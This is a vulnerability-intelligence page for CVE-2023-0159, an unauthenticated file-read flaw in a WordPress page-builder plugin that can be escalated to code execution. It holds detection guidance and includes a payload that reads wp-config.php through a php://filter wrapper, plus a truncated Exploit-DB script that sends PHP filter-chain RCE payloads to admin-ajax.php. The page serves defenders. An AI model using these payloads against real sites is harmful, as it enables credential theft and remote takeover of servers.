CVE-2023-0159
published 2023-02-13CVE-2023-0159: The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading…
PriorityP182high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
55.74%
98.9th percentile
The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wprealize | extensive_vc_addons_for_wpbakery_page_builder | < 1.9.1 | 1.9.1 |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php↗
- →Detect exploitation attempts by monitoring POST requests to /wp-admin/admin-ajax.php containing the action parameter 'extensive_vc_init_shortcode_pagination' combined with 'options[template]' containing a php:// filter wrapper. ↗
- →Successful exploitation returns a JSON response body containing the string '{"status":"success","message":"Items are loaded","data":' — match this in HTTP response bodies alongside the above request pattern to confirm LFI/RCE. ↗
- →RCE escalation uses PHP filter chains passed via options[template]; look for long php://filter/convert.iconv.* chains in POST body to /wp-admin/admin-ajax.php with action=extensive_vc_init_shortcode_pagination. ↗
- →Presence of the plugin directory /wp-content/plugins/extensive-vc-addon/ in HTTP responses can be used to fingerprint vulnerable targets for proactive scanning. ↗
- ·The vulnerability is unauthenticated — no session cookie or authentication token is required to exploit it. Detection rules must not filter out unauthenticated requests to admin-ajax.php. ↗
- ·The PHP filter chain RCE payload can be arbitrarily long and varied (different iconv conversion sequences per character), making static payload matching insufficient; focus on the action name and php:// scheme prefix in options[template]. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c4h9-8c9r-v3m8: The Extensive VC Addons for WPBakery page builder WordPress plugin before 1
ghsa_unreviewed·2023-02-13
CVE-2023-0159 [HIGH] CWE-22 GHSA-c4h9-8c9r-v3m8: The Extensive VC Addons for WPBakery page builder WordPress plugin before 1
The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system.
VulnCheck
Extensive VC Addons for WPBakery Php Extract Function Unauthenticated RCE
vulncheck·2023·CVSS 7.5
CVE-2023-0159 [HIGH] Extensive VC Addons for WPBakery Php Extract Function Unauthenticated RCE
Extensive VC Addons for WPBakery Php Extract Function Unauthenticated RCE
The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
Affected: wprealize extensive_vc_addons_for_wpbakery_page_builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-08-17&host_type=src&vulnerability=cve-2023-0159; h
No detection rules found.
Exploit-DB
Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)
exploitdb·2025-03-19·CVSS 7.5
CVE-2023-0159 [HIGH] Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)
Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)
---
# Exploit Title: Extensive VC Addons for WPBakery page builder '
# Generate filter chain
try:
result = subprocess.run(
[generator_path, '--chain', php_code],
capture_output=True,
text=True,
check=True
)
payload = None
for line in result.stdout.split('\n'):
if line.startswith('php://filter'):
payload = line.strip()
break
if not payload:
print("[-] Failed to generate payload")
return
url = f"{target}/wp-admin/admin-ajax.php"
data = {'action': 'extensive_vc_init_shortcode_pagination', 'options[template]': payload}
print(f"[*] Sending payload for command: {command}")
start_time = time.time()
# Send the request to attempt RCE and dont forget to pass the generator path
response = requests.post(url, data=d
Nuclei
Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
nuclei·CVSS 7.5
CVE-2023-0159 [HIGH] Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
Template:
id: CVE-2023-0159
info:
name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
author: c4sper0
severity: high
description: |
The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
impact: |
Un
2023-02-13
Published
Exploited in the wild